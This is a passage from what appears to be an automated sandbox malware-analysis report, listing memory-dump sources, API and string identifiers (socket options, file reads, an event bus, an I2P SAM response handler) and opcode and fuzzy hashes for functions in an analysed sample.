    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
    • API String ID: 1729277954-3534120083
    • Opcode ID: 0f2572865ae401fbe053a1d484b6772c666df8ec2b438324ddcda121cf04f42d
    • Instruction ID: 20420dc6ecc6e28d202812ce54b3a6e4679dfedf599cbf476a20810c0cac9a6c
    • Opcode Fuzzy Hash: 0f2572865ae401fbe053a1d484b6772c666df8ec2b438324ddcda121cf04f42d
    • Instruction Fuzzy Hash: A8F09661A089028EE7105B2BF8005A96661FBA87B4F4043B5ED7E93BB4DE7CD54ACB04
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
    • API String ID: 1729277954-3534120083
    • Opcode ID: b7910580d3c89d53adf9108fdd7655c2341bdd227db08ebf00b35b0a1738a65b
    • Instruction ID: 70dc7ea8fa50fdbed110b47843d931578ceacb8284586ebcb3a0900fa7046183
    • Opcode Fuzzy Hash: b7910580d3c89d53adf9108fdd7655c2341bdd227db08ebf00b35b0a1738a65b
    • Instruction Fuzzy Hash: CBF0B161B08142C6F3505B66B4005A66551FB88764F044137EDED837B8DF7CD949C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
    • API String ID: 1729277954-3534120083
    • Opcode ID: a38d3d85025679210775f2dd95c36e3eabbea3f50d9042afafabc5e59aa88030
    • Instruction ID: d94a2d9c37149ee3270909e9cfbc0be671d1844e7b346bded230d46b4a79778e
    • Opcode Fuzzy Hash: a38d3d85025679210775f2dd95c36e3eabbea3f50d9042afafabc5e59aa88030
    • Instruction Fuzzy Hash: A9F096A1A089468AF7109B2BBC406B56661EB947B4F0082B1ED6D837F8DEBCD549CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
    • API String ID: 1729277954-3534120083
    • Opcode ID: c786cd30c200715e9b9f3fc006fbf942f08d920c68ea867736f01aa526706d9d
    • Instruction ID: d345ecdbe61421b054c752b2ebdc13643dc1c48d6b6cb249e3aa46a747f92cbc
    • Opcode Fuzzy Hash: c786cd30c200715e9b9f3fc006fbf942f08d920c68ea867736f01aa526706d9d
    • Instruction Fuzzy Hash: 63F02B61B0C95286F7109FABBC002A76564BB84774F449271ED6D837F4DE3CE549C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
    • API String ID: 1729277954-3534120083
    • Opcode ID: 59d7653ef6b810c573ce67dbddc6f1998876698b41c5f13ea5785c6b21fa4502
    • Instruction ID: 58f2151a824901ace4306ba38c769762b6b85ae028126e712bf324470b2bd7ed
    • Opcode Fuzzy Hash: 59d7653ef6b810c573ce67dbddc6f1998876698b41c5f13ea5785c6b21fa4502
    • Instruction Fuzzy Hash: FFF02B71B0C1428AF3105F65F8005A66661AF84B60F448233EDED837B5DF7CD94ACB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
    • API String ID: 1729277954-3534120083
    • Opcode ID: c5eef0ac53a77a643dc5dd434250c134fc18672fd7dc470e485df4f196bd4b57
    • Instruction ID: ea3df3a9fbd1c7bd7cce303d57582202abd764604fb63550cc4a965a9e88cb39
    • Opcode Fuzzy Hash: c5eef0ac53a77a643dc5dd434250c134fc18672fd7dc470e485df4f196bd4b57
    • Instruction Fuzzy Hash: 06F096A3F1864286F3205F29A8006B66561EB84794F404235EEED837F8DF7CD946CF00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
    • API String ID: 1729277954-536111009
    • Opcode ID: 9867e54280154e7b9a3a4cdcb5c4b1052708605af9dda341dab169b997e877e5
    • Instruction ID: 4c29a63b3e65c1393c99aef5acd2827b62567ea3a082a265092232aee9577b39
    • Opcode Fuzzy Hash: 9867e54280154e7b9a3a4cdcb5c4b1052708605af9dda341dab169b997e877e5
    • Instruction Fuzzy Hash: 9EF0BB61A1894686F7109B27BC4057566A0FF847B4F104271ED6D837F4DEFCD5098B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: memsetstrchr
    • String ID: [D] (%s) -> %s$sam3_recv_rsp
    • API String ID: 2564583029-4292814133
    • Opcode ID: b43e11e523420d980cc510fa71f7f54ffd739c9cfb992ba78ea50428caf00919
    • Instruction ID: 45bc9162b0441ee06ba7e9fd5a5a5a8fd6b6d0bf42b2ae12d5d94d477d8bdcb7
    • Opcode Fuzzy Hash: b43e11e523420d980cc510fa71f7f54ffd739c9cfb992ba78ea50428caf00919
    • Instruction Fuzzy Hash: 02216D12F0CE9F47FA215A2B9C5437915405F06BB0F1843B1EEBD4A7EAED9CA8428301
    APIs
    Strings
    • ebus_dispatch, xrefs: 00007FFE0E13132F
    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E131336
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
    • API String ID: 3168844106-1717220914
    • Opcode ID: dd72387e13e98889c55651ba2217bbe6d146ade0cf969d2aa47e14591c4ae9b9
    • Instruction ID: 20006e3347bb6f1a5ac8eaa54932fc78e3cce2a369272d7b73d1e02918c339ff
    • Opcode Fuzzy Hash: dd72387e13e98889c55651ba2217bbe6d146ade0cf969d2aa47e14591c4ae9b9
    • Instruction Fuzzy Hash: B2210B72A09B46D5EB618F25F84026DB360FB48B94B544136DAED87BB8DF3CD895C700
    APIs
    Strings
    • ebus_dispatch, xrefs: 00007FFE126D602F
    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE126D6036
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
    • API String ID: 3168844106-1717220914
    • Opcode ID: b3dfa94311c8b84ceee6a75c31448f86a05eb3f31c273551a0a4ff09e043467c
    • Instruction ID: 8fa30343936b55281386e9b74d76ddb5296d1d718fd7b424478bd4e9d37eff11
    • Opcode Fuzzy Hash: b3dfa94311c8b84ceee6a75c31448f86a05eb3f31c273551a0a4ff09e043467c
    • Instruction Fuzzy Hash: F2214F32A08E8A86EB50CF16FC405696364FB94BA4F584171DA9D47BF8DF7CD856C700
    APIs
    Strings
    • ebus_dispatch, xrefs: 00007FFE0E16A2EF
    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E16A2F6
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
    • API String ID: 3168844106-1717220914
    • Opcode ID: abe5f35f3c3aae9c3b5b648d907283798934e6446cc0c3a7aa2c6f94d3ff3ba4
    • Instruction ID: 282061c310a4db40974a470734113d4f0f53ad43e7350501ab184cdb9068a39d
    • Opcode Fuzzy Hash: abe5f35f3c3aae9c3b5b648d907283798934e6446cc0c3a7aa2c6f94d3ff3ba4
    • Instruction Fuzzy Hash: 89214A32A08A8782EB658F25E94016973A0FF58F94F184136DADE577B9DF3CE885C740
    APIs
    Strings
    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EB41336
    • ebus_dispatch, xrefs: 00007FFE0EB4132F
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
    • API String ID: 3168844106-1717220914
    • Opcode ID: 53be27b5488155eb9d11ec7e73c08101b340e636c0ab373d64c12a5dd52b1cd8
    • Instruction ID: 0877965e7c6f19da52155e4b76aa2280994945573815de448931bd6a63ff310a
    • Opcode Fuzzy Hash: 53be27b5488155eb9d11ec7e73c08101b340e636c0ab373d64c12a5dd52b1cd8
    • Instruction Fuzzy Hash: B1210B72A09B4682EB759F15E840269B7A0FB44B94F184131DA9D877B8DF3CD895CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
    • Instruction ID: 21367feb97e7ce12d760d7fd804b87628b0895d2f3d00d3b53896461f4ca9d18
    • Opcode Fuzzy Hash: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
    • Instruction Fuzzy Hash: C7F05E2BB1821243F9539B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAD86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
    • Instruction ID: 21367feb97e7ce12d760d7fd804b87628b0895d2f3d00d3b53896461f4ca9d18
    • Opcode Fuzzy Hash: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
    • Instruction Fuzzy Hash: C7F05E2BB1821243F9539B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAD86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
    • Instruction ID: 21367feb97e7ce12d760d7fd804b87628b0895d2f3d00d3b53896461f4ca9d18
    • Opcode Fuzzy Hash: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
    • Instruction Fuzzy Hash: C7F05E2BB1821243F9539B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAD86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
    • Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
    • Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
    • Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
    • Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
    • Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
    • Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
    • Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
    • Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
